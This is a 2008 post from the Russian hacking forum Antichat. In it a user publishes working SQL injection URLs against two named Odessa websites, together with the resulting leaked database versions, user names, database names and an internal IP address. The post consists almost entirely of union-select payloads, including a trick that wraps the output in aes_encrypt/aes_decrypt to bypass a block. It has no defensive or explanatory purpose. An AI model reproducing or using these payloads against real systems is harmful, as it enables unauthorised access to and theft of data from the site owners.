ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 24.06.2008, 05:39
Аватар для furang
furang
Познающий
Регистрация: 07.04.2007
Сообщений: 88
Провел на форуме:
6406543

Репутация: 48
По умолчанию

Бага

Цитата:
http://tid.odessa.ua/news/?newsid=-513+union+select+1,2,3,4,5/*
Глянем имя БД
Цитата:
http://tid.odessa.ua/news/?newsid=-513+union+select+concat_ws(0x3a3a,version(),user() ,database()),2,3,4,5/*
Облом... а если так???

Цитата:
http://tid.odessa.ua/news/?newsid=-513+union+select+aes_decrypt(aes_encrypt(concat_ws (0x3a3a,version(),user(),database()),0x71),0x71),2 ,3,4,5/*
4.1.11-Debian_4sarge8-log::newtid@localhost::newtid

Бага
Цитата:
http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0& idn=-1213960526+union+select+1,2,3,4,5
Цитата:
http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0& idn=-1213960526+union+select+1,2,3,concat_ws(0x3a3a,ver sion(),user(),database()),5
5.0.45-Debian_1ubuntu3.3-log::rus1@10.0.0.46::news_music

Если чесно х3 откуда в линках пробелы побрались, их небыло!!!!! Поубирать не забудьте.

Последний раз редактировалось furang; 24.06.2008 в 05:52..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ